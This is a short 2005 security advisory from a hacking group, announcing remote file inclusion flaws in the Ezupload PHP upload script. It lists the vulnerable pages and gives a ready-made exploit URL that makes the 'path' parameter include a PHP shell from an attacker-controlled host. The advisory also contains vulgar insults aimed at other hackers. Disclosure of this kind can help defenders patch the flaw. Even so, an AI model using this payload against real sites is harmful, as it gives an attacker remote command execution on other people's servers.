__________           .___ ________                                      
\______   \ ____   __| _/ \______ \____________     ____   ____   ____  
 |       _// __ \ / __ |   |    |  \_  __ \__  \   / ___\ /  _ \ /    \ 
 |    |   \  ___// /_/ |   |    `   \  | \// __ \_/ /_/  >  <_> )   |  \
 |____|_  /\___  >____ |  /_______  /__|  (____  /\___  / \____/|___|  /
        \/     \/     \/          \/           \//_____/             \/ 

Status       : Public
Date Public  : 9 Aug 2005
Vuln prog    : Ezupload
Risk         : High
Impact       : Ezupload Multiple File Inclusion Vulnerabilities


Vuln pages :
~~~~~~~~~~~~

customize.php , form.php , index.php , initialize.php


Exploitin :
~~~~~~~~~~~

http://victim/ezupload/<vulnpage>.php?path=http://evilhost/phpshell?&


Greets :
~~~~~~~~
- sirh0t , Elisabeth And Her Bf Mattias


Suck my dick :
~~~~~~~~~~~~~~
- 0x1fe , cobradriver , EX0


Credits :
~~~~~~~~~

Discovered by Johnnie Walker <whisky@bsdmail.org>

Red Dragon :
~~~~~~~~~~~~

Nightmare . Johnnie Walker . 3rbil


-- 
_______________________________________________
Get your free email from http://mymail.bsdmail.com